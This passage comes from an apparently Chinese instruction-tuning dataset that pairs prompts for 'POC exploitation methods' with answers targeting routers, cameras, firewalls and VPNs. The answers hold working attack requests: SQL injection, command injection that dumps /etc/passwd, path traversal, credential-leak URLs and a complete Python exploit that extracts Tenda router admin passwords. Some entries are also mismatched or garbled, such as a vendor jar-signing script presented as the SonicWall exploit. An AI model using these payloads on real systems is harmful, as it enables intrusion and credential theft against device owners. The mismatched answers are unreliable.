"awesome_poc_dataset", "file_path": "网络设备漏洞/Apache APISIX Dashboard API权限绕过导致RCE CVE-2021-45232.md"}
    345. 

  345. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞\n漏洞描述:华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞\n影响版本:``` 华夏创新 LotWan广域网优化系统 ```\n网络测绘:``` title=\"LotWan 广域网优化系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 华夏创新 LotWan广域网优化系统\n2. title=\"LotWan 广域网优化系统\"\n3. /acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞.md"}
    346. 

  346. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:腾达路由器 D151/D31未经身份验证的配置下载\n漏洞描述:攻击者可利用此漏洞,通过请求{IP}/goform/getimage即可下载当前路由器配置(包括管理员登录名),也可以通过请求激活telnet服务/goform/telnet(默认情况下该服务已启用)。\n影响版本:``` D301 1.2.11.2_EN D301 V2.0 50.22.1.8_EN D151 V2.0 50.21.1.5_EN ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. D301 1.2.11.2_EN\nD301 V2.0 50.22.1.8_EN\nD151 V2.0 50.21.1.5_EN\n2. import struct\nimport itertools\nimport random, sys\nimport requests\nimport base64\n\n\n\nFETCH_CODE = \"\\x80\\x0f\\x07\\xe7\\x83i\\xb0@v2\\x9c\\x8ef\\x93y\\xb8z\"\nADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'}\n\nCLEAR_CODE = 256\nEND_OF_CODE = CLEAR_CODE + 1\n\nMIN_WIDTH = 8\nDEFAULT_MIN_BITS = MIN_WIDTH + 1\nDEFAULT_MAX_BITS = 12\n\n\n\n\ndef cmsDecoder(compressed_cfg):\n    _cp_dict = dict((pt, struct.pack(\"B\", pt)) for pt in range(256))\n    _cp_dict[CLEAR_CODE] = CLEAR_CODE\n    _cp_dict[END_OF_CODE] = END_OF_CODE\n    prefix, offset, ignore = None, 0, 0\n    codepoints_arr, remainder, bits = [], [], []\n\n    init_csize = len(_cp_dict)\n\n    codesize = init_csize\n    minwidth = MIN_WIDTH\n    while (1 << minwidth) < codesize:\n        minwidth = minwidth + 1\n    pointwidth = minwidth\n\n    buts_arr = []\n    for b in compressed_cfg:\n        value = struct.unpack(\"B\", b)[0]\n        for bitplusone in range(8, 0, -1):\n            bitindex = bitplusone - 1\n            buts_arr.append(1 & (value >> bitindex))\n\n    for nextbit in buts_arr:\n        offset = (offset + 1) % 8\n        if ignore > 0:\n            ignore = ignore - 1\n            continue\n        bits.append(nextbit)\n        if len(bits) == pointwidth:\n            cp_int = 0\n            lsb_first = [b for b in bits]\n            lsb_first.reverse()\n            for bit_index in range(len(lsb_first)):\n                if lsb_first[bit_index]:\n                    cp_int = cp_int | (1 << bit_index)\n\n            bits = []\n            codepoints_arr.append(cp_int)\n            codesize = codesize + 1\n            if cp_int in [CLEAR_CODE, END_OF_CODE]:\n                codesize = init_csize\n                pointwidth = minwidth\n            else:\n                while codesize >= (2 ** pointwidth):\n                    pointwidth = pointwidth + 1\n            if cp_int == END_OF_CODE:\n                ignore = (8 - offset) % 8\n\n\n    decodedBytes = []\n    for cp_int in codepoints_arr:\n\n        suffix = \"\"\n        if cp_int == CLEAR_CODE:\n            _cp_dict = dict((pt, struct.pack(\"B\", pt)) for pt in range(256))\n            _cp_dict[CLEAR_CODE] = CLEAR_CODE\n            _cp_dict[END_OF_CODE] = END_OF_CODE\n            prefix = None\n\n        elif cp_int != END_OF_CODE:\n            if cp_int in _cp_dict:\n                suffix = _cp_dict[cp_int]\n                if None != prefix:\n                    _cp_dict[len(_cp_dict)] = prefix + suffix[0]\n            else:\n                suffix = prefix + prefix[0]\n                _cp_dict[len(_cp_dict)] = suffix\n            prefix = suffix\n        decoded = suffix\n        for char in decoded:\n            decodedBytes.append(char)\n    return decodedBytes\n\n\n\n\n\n\ndef exploit(ip):\n    print \"[!] Downloading config\"\n    try:\n        r = requests.get(\"http://{}/goform/getimage\".format(ip))\n        pass\n    except:\n        print \"[-] Failed to download the config, the target may not be vulnerable\"\n\n    BIN_CONTENT = r.content\n    BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50]\n\n    CONFIG_XML = b\"\".join(cmsDecoder(BIN_CONTENT))\n\n    USER_, PASS_ = \"\", \"\"\n    for i in ADMIN_LOG_CFG.keys():\n        if i in CONFIG_XML:\n            CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]\n            PASS_ = CONFIG_XML[:CONFIG_XML.index('</')]\n            USER_ = ADMIN_LOG_CFG[i]\n            print \"\\tusername: {}\\n\\tpassword: {}\\n\".format(USER_, base64.b64decode(PASS_).rstrip('\\x00'))\n            return 0\n    print \"[-] Failed to decode the config file\\n\"\n    return -1\n\n\n\nif len(sys.argv) == 1:\n    print \"usage: python2 \" + sys.argv[0] + \" router_ip\"\n    print \"example: python2 exploit.py http://192.168.1.1\"\n    exit()\n\n\n\nif __name__ == \"__main__\":\n\n    print \"\"\"\\\n        _  _\n  ___ (~ )( ~)\n /   \\_\\ \\/ /   \n|   D_ ]\\ \\/  -- By BenCh@li@h\n|   D _]/\\ \\  -- BenChaliah@github\n \\___/ / /\\ \\\\\n      (_ )( _)\n          \n\"\"\"\n\n    try:\n        exploit(sys.argv[1])\n    except Exception as e:\n        print str(e)\n3. 攻击者可利用此漏洞,通过请求{IP}/goform/getimage即可下载当前路由器配置(包括管理员登录名),也可以通过请求激活telnet服务/goform/telnet(默认情况下该服务已启用)。\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/腾达 路由器 D151D31未经身份验证的配置下载.md"}
    347. 

  347. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229\n漏洞描述:Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据。\n影响版本:``` Amcrest Technologies. Amcrest IP Camera Web all ```\n网络测绘:``` \"Amcrest\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2017-8229\n【POC利用方法】\n1. Amcrest Technologies. Amcrest IP Camera Web all\n2. /current_config/Sha1Account1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229.md"}
    348. 

  348. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KEDACOM数字系统接入网关 任意文件读取漏洞\n漏洞描述:KEDACOM 数字系统接入网关 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件\n影响版本:``` KEDACOM 数字系统接入网关 ```\n网络测绘:``` (app=\"KEDACOM-DVR接入网关\") && (is_honeypot=false && is_fraud=false) ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. KEDACOM 数字系统接入网关\n2. (app=\"KEDACOM-DVR接入网关\") && (is_honeypot=false && is_fraud=false)\n3. /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/KEDACOM数字系统接入网关 任意文件读取漏洞.md"}
    349. 

  349. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞\n漏洞描述:大华 智慧园区综合管理平台 getFaceCapture 接口存在SQL注入漏洞,攻击者通过漏洞可以执行任意SQL语句,获取数据库敏感信息\n影响版本:智慧园区综合管理平台\n网络测绘:``` app=\"dahua-智慧园区综合管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"dahua-智慧园区综合管理平台\"\n2. /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D\n3. /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞.md"}
    350. 

  350. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网康 下一代防火墙 router 远程命令执行漏洞\n漏洞描述:奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限\n影响版本:``` 奇安信 网康下一代防火墙 ```\n网络测绘:``` app=\"网康科技-下一代防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 奇安信 网康下一代防火墙\n2. app=\"网康科技-下一代防火墙\"\n3. ![2](C:\\Users\\47236\\Desktop\\2.png)POST /directdata/direct/router HTTP/1.1\nHost: XXX.XXX.XXX.XXX\nConnection: close\nContent-Length: 179\nCache-Control: max-age=0\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nContent-Type: application/json\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_cmd.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网康 下一代防火墙 router 远程命令执行漏洞.md"}
    351. 

  351. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞\n漏洞描述:浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令\n影响版本:``` 浙江宇视科技 网络视频录像机 ISC ```\n网络测绘:``` app=\"uniview-ISC\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 浙江宇视科技 网络视频录像机 ISC\n2. app=\"uniview-ISC\"\n3. /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞.md"}
    352. 

  352. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506\n漏洞描述:D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 1%0a来获取getcfg.php的路由器的用户名和密码(以及其他信息)。这可用于远程控制路由器\n影响版本:``` D-Link Dir 系列多个版本 ```\n网络测绘:``` app=\"D_Link-DIR-868L\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-17506\n【POC利用方法】\n1. D-Link Dir 系列多个版本\n2. app=\"D_Link-DIR-868L\"\n3. POST /getcfg.php HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nContent-Length: 61\n\nSERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DIR-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506.md"}
    353. 

  353. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 云课堂主机 pool 目录遍历漏洞\n漏洞描述:锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.\n影响版本:``` 锐捷云课堂 ```\n网络测绘:``` title=\"Ruijie\" && \"云课堂主机\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"Ruijie\" && \"云课堂主机\"\n2. 访问 http://xxx.xxx.xxx.xxx/pool 造成目录遍历\n3. 锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 云课堂主机 pool 目录遍历漏洞.md"}
    354. 

  354. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DrayTek企业网络设备 远程命令执行 CVE-2020-8515\n漏洞描述:DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。 远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。\n影响版本:``` Vigor2960 < v1.5.1 Vigor300B < v1.5.1 Vigor3900 < v1.5.1 VigorSwitch20P2121 <= v2.3.2 VigorSwitch20G1280 <= v2.3.2 VigorSwitch20P1280 <= v2.3.2 VigorSwitch20G2280 <= v2.3.2 VigorSwitch20P2280 <= v2.3.2 ```\n网络测绘:``` title=\"Vigor 2960\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-8515\n【POC利用方法】\n1. Vigor2960 < v1.5.1\nVigor300B < v1.5.1\nVigor3900 < v1.5.1\nVigorSwitch20P2121 <= v2.3.2\nVigorSwitch20G1280 <= v2.3.2\nVigorSwitch20P1280 <= v2.3.2\nVigorSwitch20G2280 <= v2.3.2\nVigorSwitch20P2280 <= v2.3.2\n2. title=\"Vigor 2960\"\n3. POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nConnection: close\nContent-Length: 67\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36\nContent-Type: text/plain; charset=UTF-8\nAccept: */*\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\n\naction=login&keyPath=%27%0A%2fbin%2fls%0A%27&loginUser=a&loginPwd=a\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/DrayTek企业网络设备 远程命令执行 CVE-2020-8515.md"}
    355. 

  355. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 SSL VPN 越权访问漏洞\n漏洞描述:Ruijie SSL VPN 存在越权访问漏洞,攻击者在已知用户名的情况下,可以对账号进行修改密码和绑定手机的操作。并在未授权的情况下查看服务器资源\n影响版本:``` Ruijie SSL VPN ```\n网络测绘:``` icon_hash=\"884334722\" || title=\"Ruijie SSL VPN\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Ruijie SSL VPN\n2. icon_hash=\"884334722\" || title=\"Ruijie SSL VPN\"\n3. GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 SSL VPN 越权访问漏洞.md"}
    356. 

  356. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Citrix NetScaler ADC & Gateway 信息泄露漏洞 CVE-2023-4966\n漏洞描述:NetScaler ADC和NetScaler Gateway是美国思杰(Citrix)公司的产品。Citrix Gateway是一套安全的远程接入解决方案,可提供应用级和数据级管控功能,以实现用户从任何地点远程访问应用和数据;Citrix ADC是一个全面的应用程序交付和负载均衡解决方案,用于实现应用程序安全性、整体可见性和可用性。 在 Citrix 设备设置为网关(VPN 虚拟服务器、ICA 代理、CVPN、RDP 代理)或 AAA 虚拟服务器的情况下,可以通过访问`/oauth/idp/.well-known/openid-configuration`路由并往 HOST字段发送大量数据从而泄露缓冲区信息,其中可能包含session cookie相关信息,攻击者可以借助该信息无需经过身份验证实现访问。 参考链接: - https://xz.aliyun.com/t/13031\n影响版本:``` NetScaler ADC 和 NetScaler Gateway 14.1 < 14.1-8.50 NetScaler ADC 和 NetScaler Gateway 13.1 < 13.1-49.15 NetScaler ADC 和 NetScaler Gateway 13.0 < 13.0-92.19 NetScaler ADC 13.1-FIPS < 13.1-37.164 NetScaler ADC 12.1-FIPS < 12.1-55.300 NetScaler ADC 12.1-NDcPP < 12.1-55.300 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2023-4966\n【POC利用方法】\n1. NetScaler ADC 和 NetScaler Gateway 14.1 < 14.1-8.50\nNetScaler ADC 和 NetScaler Gateway 13.1 < 13.1-49.15\nNetScaler ADC 和 NetScaler Gateway 13.0 < 13.0-92.19\nNetScaler ADC 13.1-FIPS < 13.1-37.164\nNetScaler ADC 12.1-FIPS < 12.1-55.300\nNetScaler ADC 12.1-NDcPP < 12.1-55.300\n2. # 更新前\n\niVar3 = snprintf(print_temp_rule,0x20000,\n               \"{\\\"issuer\\\": \\\"https://%.*s\\\", \\\"authorization_endpoint\\\": \\\"https://%.*s/oauth/ idp/login\\\", \\\"token_endpoint\\\": \\\"https://%.*s/oauth/idp/token\\\", \\\"jwks_uri\\\":  \\\"https://%.*s/oauth/idp/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"toke n\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end _session_endpoint\\\": \\\"https://%.*s/oauth/idp/logout\\\", \\\"frontchannel_logout_sup ported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_support ed\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr \\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoin t\\\": \\\"https://%.*s/oauth/idp/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\"\n               ,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nauthv2_json_resp = 1;\niVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,iVar3);\n3. # 更新后\n\nuVar7 = snprintf(print_temp_rule,0x20000,\n               \"{\\\"issuer\\\": \\\"https://%.*s\\\", \\\"authorization_endpoint\\\": \\\"https://%.*s/oauth/ idp/login\\\", \\\"token_endpoint\\\": \\\"https://%.*s/oauth/idp/token\\\", \\\"jwks_uri\\\":  \\\"https://%.*s/oauth/idp/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"toke n\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end _session_endpoint\\\": \\\"https://%.*s/oauth/idp/logout\\\", \\\"frontchannel_logout_sup ported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_support ed\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr \\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoin t\\\": \\\"https://%.*s/oauth/idp/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\"\n               ,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nuVar4 = 0x20;\nif (uVar7 < 0x20000) {\n    authv2_json_resp = 1;\n    iVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,uVar7);\n    ...\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Citrix NetScaler ADC & Gateway 信息泄露漏洞 CVE-2023-4966.md"}
    357. 

  357. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SonicWall SSL-VPN 远程命令执行漏洞\n漏洞描述:SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞\n影响版本:``` SonicWall SSL-VPN ```\n网络测绘:``` app=\"SONICWALL-SSL-VPN\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. SonicWall SSL-VPN\n2. app=\"SONICWALL-SSL-VPN\"\n3. #!/bin/bash\n\n# jarrewrite.sh:\n# Script takes a jar/class file and a working directory; modifies class files\n# within the jar and repackages them.\n\nUSAGE_STR=\"Usage: $0 <jar/class file> <path-to-working directory>\"\n\n# Validate number of args\nif [ $# -ne 2 ]; then\necho ${USAGE_STR};\nexit -1;\nfi\n\nfor param in $*; do\n    if [ \"$param\" == \"-h\" ]; then\n        echo ${USAGE_STR};\n        exit 1;\n    fi\ndone\n\n# constants\nBOUNDARY=\"-------------------------------------------------------------\"\nBASE_DIR=/tmp\nJAVA_SRC=$1\nWDIR=$2\nCWD=`pwd`\nFULL_JAVA_SRC_PATH=${BASE_DIR}/${WDIR}/${JAVA_SRC}\nCLASSES_DIR=classes\nMETA_INF_DIR=${BASE_DIR}/${WDIR}/${CLASSES_DIR}/META-INF\nMANIFEST=${META_INF_DIR}/MANIFEST.MF\nMANIFEST_DIGEST_FILE=${META_INF_DIR}/SWALL_SIGNATURE.SF\nSIGNATURE_FILE=${META_INF_DIR}/SWALL_SIGNATURE.DSA\nCODESIGNER_CRT=./../../var/cs_cert/httprpCodeSignerX509Crt.pem\nCODESIGNER_PVTKEY=./../../var/cs_cert/httprpCodeSignerPvtkey.pem\nDO_SIGN=0\n\nif [ ! -f  ${FULL_JAVA_SRC_PATH} ];then\necho \"File not found: ${FULL_JAVA_SRC_PATH}\";\nexit -2;\nfi\n\nif [ ${JAVA_SRC##*.} == \"jar\" ]\n# Using bracket in variable substitution.\nthen\n\n# organize\nmkdir ${BASE_DIR}/$WDIR/$CLASSES_DIR\n\n# unzip jar\nunzip -d ${BASE_DIR}/${WDIR}/${CLASSES_DIR} ${FULL_JAVA_SRC_PATH};\n\n# Simple sanity check to see if the JAR has already been signed. \n# FIXME: This is not a complete check,because the original JAR signature \n# has to be verified completely otherwise a malicious applet\n# could access the local resources with SSL VPN signing it.\n\nold_sf_files=`/bin/ls ${META_INF_DIR}/*.[sS][fF] `\nold_sign_files=`/bin/ls ${META_INF_DIR}/*.[rRdD][sS][aA] `\n\nfor sf_file in $old_sf_files\ndo\n\tfor sign_file in $old_sign_files\n    do\n        DO_SIGN=1;\n        break\n    done;\n    break;\ndone\n\n# remove all manifest info including signatures\n# remove all that match mf|MF|sf|SF or dsa|DSA|rsa|RSA\nrm -f ${BASE_DIR}/${WDIR}/${CLASSES_DIR}/META-INF/*.[sSmM][fF] ${BASE_DIR}/${WDIR}/${CLASSES_DIR}/META-INF/*.?[sS][aA]\n\nOUTPUT_JAR=\"${FULL_JAVA_SRC_PATH}\"\n\nclassfiles=`/usr/bin/find ${BASE_DIR}/${WDIR}/${CLASSES_DIR} -type f`\n\n#New Manifest file\nMANIFEST_MAIN_ATTR=\"Manifest-Version: 1.0\\nCreated-By: 1.0 (SonicWALL Inc.)\\n\"\n\necho -e \"Creating Manifest file ... \" \necho -e ${MANIFEST_MAIN_ATTR} > ${MANIFEST}\n\nfor file in $classfiles\ndo\n\techo $BOUNDARY\n\techo $file\n\techo $BOUNDARY\n\t./jdasm $file $file\n\n\t#Update manifest file\n\tSHA1_MANIFEST_ENTRY_CLASS=`openssl dgst -sha1 -binary $file | openssl base64`\n\tMANIFEST_ENTRY=\"Name: ${file##${BASE_DIR}/${WDIR}/${CLASSES_DIR}/}\\nSHA1-Digest: ${SHA1_MANIFEST_ENTRY_CLASS}\\n\"\n\techo -e ${MANIFEST_ENTRY} >> ${MANIFEST}\n\n\techo $BOUNDARY\ndone\n\nif [ ${DO_SIGN} == 1 ]; then\necho -e \"Creating Manifest Signature file and Signature block\" >> $OUTLOG\n/usr/sbin/sw_jarsigner -m ${MANIFEST} -s ${MANIFEST_DIGEST_FILE} -S ${SIGNATURE_FILE} -c ${CODESIGNER_CRT} -k ${CODESIGNER_PVTKEY}\nfi\n\nrm -f ${FULL_JAVA_SRC_PATH}\ncd ${BASE_DIR}/${WDIR}/${CLASSES_DIR};\nzip -r ${OUTPUT_JAR} *\ncd ${CWD}\n\n# clean\nrm -Rf ${BASE_DIR}/${WDIR}/${CLASSES_DIR}\n\nelif [ ${JAVA_SRC##*.} == \"class\" ]; then\n# if file is a class\n\nif [ ! -e  ${FULL_JAVA_SRC_PATH} ];then\necho \"File not found: ${FULL_JAVA_SRC_PATH}\";\nexit -2;\nfi\n./jdasm ${FULL_JAVA_SRC_PATH} ${FULL_JAVA_SRC_PATH};\nfi \n\necho \"Recursive Class Rewrite Completed.\"\nexit 0;\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/SonicWall SSL-VPN 远程命令执行漏洞.md"}
    358. 

  358. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Huawei HG659 lib 任意文件读取漏洞\n漏洞描述:Huawei HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件\n影响版本:``` Huawei HG659 ```\n网络测绘:``` app=\"HUAWEI-Home-Gateway-HG659\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Huawei HG659\n2. app=\"HUAWEI-Home-Gateway-HG659\"\n3. /lib///....//....//....//....//....//....//....//....//etc//passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Huawei HG659 lib 任意文件读取漏洞.md"}
    359. 

  359. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网神 下一代极速防火墙 pki_file_download 任意文件读取漏洞\n漏洞描述:网神下一代极速防火墙 pki_file_download 存在任意文件读取漏洞,攻击者可以通过漏洞获取服务器上的任意文件\n影响版本:``` 网神下一代极速防火墙 ```\n网络测绘:``` app=\"网神下一代极速防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"网神下一代极速防火墙\"\n2. GET /?g=pki_file_download&filename=../../../../../etc/passwd HTTP/1.1\nHost: \nConnection: close\nsec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: cross-site\nSec-Fetch-Mode: navigate\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: __s_sessionid__=7rl7vvg1mlc00gf4pfmo74h0t7\n3. Connection: close\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", 